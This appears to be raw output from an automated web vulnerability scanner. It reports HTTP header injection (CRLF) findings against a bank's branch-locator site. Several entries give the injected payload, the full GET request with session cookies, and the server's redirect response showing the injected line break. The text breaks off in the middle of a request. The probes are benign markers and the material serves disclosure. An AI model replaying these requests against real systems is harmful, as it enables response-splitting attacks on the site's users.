HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:45:00 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=52276A6A922E71063E79490512F1960F.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/e52af f9ec1ac6f45=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 1d3e0%0d%0af2ea2d215b9 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/1d3e0%0d%0af2ea2d215b9/bank_branch_locations/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:43:48 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=60305D66E142778223B6DD62D2A7C556.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/1d3e0 f2ea2d215b9/bank_branch_locations/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 45fd2%0d%0acc3993fc29e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/45fd2%0d%0acc3993fc29e/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:42:32 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=2AD50EF74F566D4B261C0BB6EE244FD3.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/45fd2 cc3993fc29e/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload adbd0%0d%0a36777831fb9 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/adbd0%0d%0a36777831fb9/bank_branch_locations/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:43:47 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=B931FC72A34971E39395C490D488FB4F.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/adbd0 36777831fb9/bank_branch_locations/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload e3bba%0d%0a7d5f2bbe274 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/e3bba%0d%0a7d5f2bbe274/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:43:47 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=4C6ADD51856100A0A7269CC414F06784.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/e3bba 7d5f2bbe274/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 67356%0d%0a64bd4d4f902 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/67356%0d%0a64bd4d4f902=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:45:13 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=170B3234BCA9169797FE5B21981E6EB6.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/67356 64bd4d4f902=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 553fa%0d%0aa2f1ecda7b1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
The value of REST URL parameter 4 is copied into the Location response header. The payload 1f582%0d%0a088252c0333 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
The value of REST URL parameter 3 is copied into the Location response header. The payload d5e0b%0d%0a9655fbe99d9 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
The value of REST URL parameter 4 is copied into the Location response header. The payload e4c68%0d%0a67e0b9d2a5c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
The value of REST URL parameter 5 is copied into the Location response header. The payload 3a8f7%0d%0a53e788b62d2 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
The value of REST URL parameter 3 is copied into the Location response header. The payload 2e0a3%0d%0ad089246d92e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/2e0a3%0d%0ad089246d92e/bank_branch_locations/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:48:02 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=6C1358FA77BB4ACBE3586F911D7E8D82.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/2e0a3 d089246d92e/bank_branch_locations/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload d8d03%0d%0af757e1abf0f was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/d8d03%0d%0af757e1abf0f/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:44:58 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=ED880C702B600F8CBE6A4E78DE6B2223.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/d8d03 f757e1abf0f/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 6d214%0d%0a39176fb021e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/6d214%0d%0a39176fb021e/bank_branch_locations/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; 